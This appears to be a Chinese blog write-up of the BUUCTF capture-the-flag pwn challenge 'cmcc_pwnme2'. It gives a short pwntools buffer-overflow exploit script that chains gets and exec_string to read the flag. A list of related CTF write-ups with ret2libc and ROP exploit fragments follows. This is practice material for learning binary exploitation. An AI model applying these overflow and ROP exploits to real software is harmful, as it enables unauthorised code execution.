BUUCTF之“cmcc_pwnme2”做题简单记录

最新推荐文章于 2024-01-31 14:40:58 发布
最新推荐文章于 2024-01-31 14:40:58 发布
阅读量2.6k 收藏
点赞数
分类专栏: 二进制pwn学习 文章标签: IDA 缓冲区溢出 shell payload 函数分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Probeginner/article/details/121878727
版权

这题还好,值得注意的是IDA里头函数栏里面的函数名字需要多注意其意思,说不定就
是提示的信息。

from pwn import *

p = remote('node4.buuoj.cn',25488)
elf=ELF('./pwnme2')

exec_string=0x080485cb
string=0x0804a060
gets=elf.sym['gets']

p.recvuntil('Please input:\n')

payload=b'a'*(0x6c+4)+p32(gets)+p32(0x080485cb)+p32(0x0804a060)

p.sendline(payload)
p.sendline("flag")
p.interactive()

有个比较离谱的是倒数第二行,如果用“p.send(“flag”)”那就会报错。
具体细节看这位师傅

cmcc pwnme2
pondzhang的专栏
12-25 346
from pwn import * #p = process('./pwnme2') p = remote("node3.buuoj.cn",26522) libc = ELF('./libc-2.23.so') plt_puts = 0x08048490 got_puts = 0x0804A028 main = 0x080486F8 payload = 108*'a' + p32(0xdeadbeaf) + p32(plt_puts) + p32(main) + p32(got_puts).
BUUCTFcmcc_simplerop(write up)
qq_44768749的博客
08-26 966
BUUCTFcmcc_simplerop0x01 文件分析0x02 运行0x03 IDA0x04 思路0x04-1 解法一0x04-2 解法二0x05 exp解法一解法二 0x01 文件分析 32位程序,开启NX、部分RELRO保护 0x02 运行 输入一串字符串 0x03 IDA main函数 存在栈溢出漏洞 0x04 思路 0x04-1 解法一 该题没有system函数也没有"/bin/sh",也无法泄露函数真实地址 可利用int 80h系统调用 设置系统调用参数即可执行e
pwnme2题目
10-14
cmcc搞的ctf的pwnme2题目的文件,感兴趣的同学可以下载来玩玩
[BUUCTF]PWN——cmcc_pwnme2
mcmuyanga的博客
01-20 1032
cmcc_pwnme2 附件 步骤: 例行检查,32位,开启了nx保护 本地运行一下看看大概的情况 32位ida载入 main(),10行的gets存在溢出 userfunction() main函数里就这么多东西,看看左边的函数列表,发现了挺有意思的几个函数 exec_string() add_home() add_flag() 由于exec_string()函数的存在,所以想到的是利用它来读取出flag,add_home()和add_flag()应该是这题比赛时候的目录,根据之前在buu
cmcc_pwnme2
z1r0的博客
12-29 707
cmcc_pwnme2 查看保护 直接用的ret2libc。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27722) else: r = process(file_name) elf = ELF(file_name) def dbg():
BUUCTF cmcc_simplerop
BengDouLove的博客
04-14 951
这道题打开ida又是那么一大堆一大堆的函数,也没有外部引用的段,所以就是静态链接把好多函数都链接进来了 所以就和 BUU上另一道 inndy_rop 一样,直接用ROPgadget 去找rop链 from struct import pack # Padding goes here p = '' p += pack('<I', 0x0806e82a) # pop edx ...
Amigo_CMCC_Anjian.rar_Amigo_CMCC_Anji_UltraEdit_飞信
09-21
飞信 无UltraEdit-32 UltraEdit-32
SCH-MSM8909_MAIN BOARD_CMCC_PVT_A
03-23
【标题】"SCH-MSM8909_MAIN BOARD_CMCC_PVT_A" 指的是一款基于高通骁龙MSM8909处理器的主板设计,主要用于中国移动通讯公司的定制产品。这个标题暗示了这是一个针对特定运营商的、经过私有化验证的主板设计方案。 ...
[BUUCTF]-PWN:cmcc_pwnme2解析
最新发布
2301_79326813的博客
01-31 276
保护ida。
BUUCTF-PWN-cmcc_simplerop
qq_41743240的博客
04-28 510
BUUCTF-cmcc_simplerop 开了NX IDA反编译 程序非常简单,漏洞也一眼可见 程序里面没有system,这题解法非常多,这里使用mprotect方法修改bss段,执行shellcode exploit: #coding:utf-8 from pwn import * #p=process('simplerop') p=remote('node3.b...
[BUUCTF-pwn]——cmcc_simplerop (ropchain)
Y_peak的博客
03-16 532
[BUUCTF-pwn]——cmcc_simplerop 有栈溢出,自己找rop链,最简单的方法,让ROPgadget帮我们弄好呀,可是有点长,所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到,所有这之前的都不动, 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下,其他都可以进行修改 inc就是 ++ exploit 目的:使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx
buuctf pwn2_sctf_2016
qq_42728977的博客
03-21 639
pwn2_sctf_2016 degree of difficulty: 2 source of the challenges:buuctf/sctf_2016 solving ideas:Stack overslow,atoi-function’s negative number overslow Put it in IDA32,we can see this easy program. l...
持续更新 BUUCTF——PWN(二)
weixin_41748164的博客
12-14 612
buuctf pwn 第三页
buuctf-pwn write-ups (10)
CoLin的pwn小屋
03-04 733
buuctf wp
BUUCTFpwn】解题记录(1-3页已完结)
Assassin
05-05 1997
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
pwnme2pwnme3的wp
一个码农的笔记
10-15 1432
这两个题目是cmcc的比赛,比较有意思,我把pwn的wp发出来,供大家学习,我会写的稍微详细一点,方便新手学习 pwnme2的下载地址是http://download.csdn.net/download/niexinming/10021147 题目要求:Task: 溢出,操控按顺序执行函数,读取到flag文件即可... 题目地址:nc 104.224.169.128 18887把pwnme2直接
buuctf DSACTF7月pwn 栈迁移 ret对齐 修改bss的内容 lea esp, [ecx-4] 64位格式化字符串修改got
carol2358的博客
07-27 1669
文章目录actf_2019_babystack actf_2019_babystack 栈迁移,注意ret对齐 没对齐的: 对齐的: exp: from pwn import * from LibcSearcher import * local_file = './ACTF_2019_babystack' local_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so' remote_libc = '/root/glibc-all-in-o
PWN-PRACTICE-BUUCTF-19
P1umH0的博客
09-07 149
PWN-PRACTICE-BUUCTF-19hitcontraining_bambooboxpicoctf_2018_shellcodenpuctf_2020_easyheapcmcc_pwnme2 hitcontraining_bamboobox unlink,参考:hitcontraining_bamboobox 堆技巧 unlink # -*- coding:utf-8 -*- from pwn import * #io=process("./bamboobox") io=remote("node4.
Android STK应用开发:兼容CMCC与中国联通
中国移动(CMCC)和中国联通(China Unicom)作为STK应用的重要载体,要求在开发针对这些运营商的STK应用时,必须遵循其特定的技术规范。例如,CMCC可能会要求使用特定的APDU(Application Protocol Data Unit)指令...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值